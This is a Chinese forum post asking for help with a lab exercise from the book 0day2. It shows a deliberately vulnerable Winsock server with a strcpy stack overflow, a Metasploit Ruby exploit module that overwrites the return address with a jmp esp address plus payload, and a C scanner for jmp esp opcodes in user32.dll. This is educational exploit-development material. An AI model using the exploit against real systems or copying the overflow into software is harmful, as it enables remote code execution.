这是0day2中的用ruby开发一个模块的实验,我的问题是无法像书上那样成功弹出计算器
希望各位能帮我看一下,我下面的操作是否有问题
目标主机为:52pojie的xp sp3
漏洞程序的编译器:vc6
主机是:windows 10
msf:msf5
在xp上运行的漏洞程序:
#include<iostream.h>
#include<winsock2.h>
#pragma comment(lib, "ws2_32.lib")
void msg_display(char * buf) {
char msg[200];
strcpy(msg,buf);// overflow here, copy 0x200 to 200
cout<<"********************"<<endl;
cout<<"received:"<<endl;
cout<<msg<<endl;
}
void main() {
int sock,msgsock,lenth,receive_len;
struct sockaddr_in sock_server,sock_client;
char buf[0x200]; //noticed it is 0x200
WSADATA wsa;
WSAStartup(MAKEWORD(1,1),&wsa);
if((sock=socket(AF_INET,SOCK_STREAM,0))<0) {
cout<<sock<<"socket creating error!"<<endl;
exit(1);
}
sock_server.sin_family=AF_INET;
sock_server.sin_port=htons(7777);
sock_server.sin_addr.s_addr=htonl(INADDR_ANY);
if(bind(sock,(struct sockaddr*)&sock_server,sizeof(sock_server))) {
cout<<"binging stream socket error!"<<endl;
}
cout<<"**************************************"<<endl;
cout<<" exploit target server 1.0 "<<endl;
cout<<"**************************************"<<endl;
listen(sock,4);
lenth=sizeof(struct sockaddr);
do{
msgsock=accept(sock,(struct sockaddr*)&sock_client,(int*)&lenth);
if(msgsock==-1) {
cout<<"accept error!"<<endl;
break;
} else
do {
memset(buf,0,sizeof(buf));
if((receive_len=recv(msgsock,buf,sizeof(buf),0))<0) {
cout<<"reading stream message erro!"<<endl;
receive_len=0;
}
msg_display(buf);//trigged the overflow }while(receive_len); closesocket(msgsock);
}while(receive_len);
closesocket(msgsock);
}while(1);
WSACleanup();
}
msf中exploit模块的ruby代码
#!/usr/bin/env ruby
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'failwest_test',
'Platform' => 'win' ,
'Targets' => [
['Windows 2000', {'Ret' => 0x77F8948B } ],
['Windows XP SP3',{'Ret' => 0x77dc965b } ] ],
'Payload' => {
'Space' => 250,
'BadChars' => "\x00",
}))
end #end of initialize
def exploit
connect
attack_buf = 'a'*200 + [target['Ret']].pack('V') + payload.encoded
sock.put(attack_buf)
handler
disconnect
end #end of exploit def
end #end of class def
其中xp的jmp esp地址0x77dc965b是我通过程序找的,实际上就是书上的代码
#include <windows.h>
#include <stdio.h>
#define DLL_NAME "user32.dll"
int main() {
BYTE* ptr;
int position,address;
HINSTANCE handle;
BOOL done_flag = FALSE;
handle=LoadLibrary(DLL_NAME);
if(!handle) {
printf(" load dll erro !"); exit(0);
}
ptr = (BYTE*)handle;
for(position = 0; !done_flag; position++) {
try {
if(ptr[position] == 0xFF && ptr[position+1] == 0xE4) {
//0xFFE4 is the opcode of jmp esp
int address = (int)ptr + position;
printf("OPCODE found at 0x%x\n",address);
}
}
catch(...) {
int address = (int)ptr + position;
printf("END OF 0x%x\n", address);
done_flag = true;
}
}
}
发表于 2020-1-2 11:23
|
发表于 2020-1-2 11:52
